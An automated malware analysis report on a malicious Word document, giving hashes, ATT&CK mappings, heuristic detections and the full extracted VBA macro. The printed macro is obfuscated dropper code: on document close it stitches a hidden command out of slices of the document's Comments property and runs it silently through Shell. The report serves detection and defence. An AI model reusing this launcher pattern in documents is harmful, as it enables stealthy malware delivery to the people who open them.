Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cde441ea369c7a3c…

MALICIOUS

Office (OLE)

73.5 KB Created: 2017-10-10 10:35:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: cf87896fe73ae17b04d6403c16ecdb5b SHA-1: ebc8918dd51421906bd57d21d57d6114ea9d9c2d SHA-256: cde441ea369c7a3c7ef7595ab41ad63bc8c329702208623eb1990af96c9781fb
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Auto_Close macro is configured to execute a PowerShell command, indicated by the 'SC_STR_POWERSHELL' heuristic and the 'Shell()' call. This suggests the macro's purpose is to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.HeuristicShellOnClose-6370606-0' further supports this dropper functionality.

Heuristics 8

  • ClamAV: Doc.Dropper.HeuristicShellOnClose-6370606-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HeuristicShellOnClose-6370606-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo
    VBA.Shell$ RnNFqMdzqF, 0
    End Sub
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    End Sub
    Sub AutoClose()
    DTOLsiGSQ
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5229 bytes
SHA-256: 239a7075559926ab49c94fe88e3e64829957026fb45bab1b5c0b32d6cc169496
Detection
ClamAV: No threats found
Obfuscation or payload: likely
44 of 69 identifiers look randomly generated (e.g. 'JaPabOCDnrS') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub DTOLsiGSQ()
HnDwfUkEWs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11977, 129)
zBfEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5951, 144)
AashkRSbk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7648, 153)
pTjDWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12572, 63)
RanvzdFlj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10593, 165)
zVufuPP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6998, 53)
fNsAaLD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 376, 131)
wfjfFcGM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1558, 60)
DfficPhpunl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14147, 108)
tGCDh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14058, 27)
laQLnTo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10299, 115)
SZikTCn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10962, 161)
QktVJBpIY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3182, 6)
DYYZKJdP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6796, 199)
JaPabOCDnrS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9930, 118)
RCbPQOWf = HnDwfUkEWs + zBfEn + AashkRSbk + pTjDWz + RanvzdFlj + zVufuPP + fNsAaLD + wfjfFcGM + DfficPhpunl + tGCDh + laQLnTo + SZikTCn + QktVJBpIY + DYYZKJdP + JaPabOCDnrS
LtAJaKYYfk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2949, 106)
dvhmmF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14092, 53)
HAzHWitMAzP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 581, 71)
XOiNtccS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5220, 64)
oKszTjbj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3535, 76)
GlKutm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14394, 10)
LXhVrkG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1792, 12)
ZtcJcNdKwik = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4368, 174)
ZNoGTlDn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2341, 81)
kLGVp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13287, 45)
HqmkCqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13714, 118)
XjjzIHri = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9234, 140)
jlRUdLF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8269, 162)
zVsoqdWtnt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12844, 142)
qGpOWEWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13099, 14)
YWVnjpW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7408, 111)
zDHCHfss = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8915, 72)
NDpcwpfcGH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10176, 100)
pNdzVTDwh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8735, 157)
UZUjDhjiL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5499, 68)
PQiuYw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5303, 169)
PBROOt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 845, 25)
JYpXEq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9379, 182)
DcFbuXc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6529, 158)
dzMObuEvT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9622, 175)
CKFqiXZF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5025, 160)
GZrNrwsZS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8057, 93)
WjlvMvid = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7846, 44)
livSsWPz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1295, 196)
WYzWYVBjwLV = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2824, 6)
EfbUuSb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8576, 124)
mEVqvuwZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11147, 112)
vuCwjOXr = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13860, 124)
iYFkTrmRCUi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 124, 5)
umvAh = RCbPQOWf + LtAJaKYYfk + dvhmmF + HAzHWitMAzP + XOiNtccS + oKszTjbj + GlKutm + LXhVrkG + ZtcJcNdKwik + ZNoGTlDn + kLGVp + HqmkCqw + XjjzIHri + jlRUdLF + zVsoqdWtnt + qGpOWEWz + YWVnjpW + zDHCHfss + NDpcwpfcGH + pNdzVTDwh + UZUjDhjiL + PQiuYw + PBROOt + JYpXEq + DcFbuXc + dzMObuEvT + CKFqiXZF + GZrNrwsZS + WjlvMvid + livSsWPz + WYzWYVBjwLV + EfbUuSb + mEVqvuwZ + vuCwjOXr + iYFkTrmRCUi
ZitGUBhrFX = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4116, 7)
rzNwlWDIj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 45, 1)
zznHLo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2466, 1)
RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo
VBA.Shell$ RnNFqMdzqF, 0
End Sub
Sub AutoClose()
DTOLsiGSQ
End Sub